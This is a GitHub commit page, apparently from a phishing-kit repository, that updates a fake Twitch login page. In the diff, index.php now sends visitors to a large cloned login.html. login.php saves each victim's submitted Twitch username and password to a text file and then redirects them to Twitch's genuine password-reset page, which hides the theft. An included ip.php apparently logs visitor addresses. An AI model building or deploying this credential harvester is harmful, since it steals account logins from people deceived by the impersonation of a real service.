Skip to content

Commit

Permalink
Updated Page: twitch
Browse files Browse the repository at this point in the history
  • Loading branch information
htr-tech committed Jan 3, 2023
1 parent badabc5 commit 26ee43a
Show file tree
Hide file tree
Showing 5 changed files with 3,283 additions and 65 deletions.
Binary file added .sites/twitch/favicon.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
2 changes: 1 addition & 1 deletion .sites/twitch/index.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
<?php
include 'ip.php';
header('Location: user.php');
header('Location: login.html');
exit
?>
3,281 changes: 3,281 additions & 0 deletions .sites/twitch/login.html

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion .sites/twitch/login.php
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
<?php

file_put_contents("usernames.txt", "Twitch Username: " . $_POST['Username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "Twitch Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://passport.twitch.tv/password_resets/new?');
exit();
?>
63 changes: 0 additions & 63 deletions .sites/twitch/user.php

This file was deleted.

1 comment on commit 26ee43a

@cyrill15
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please sign in to comment.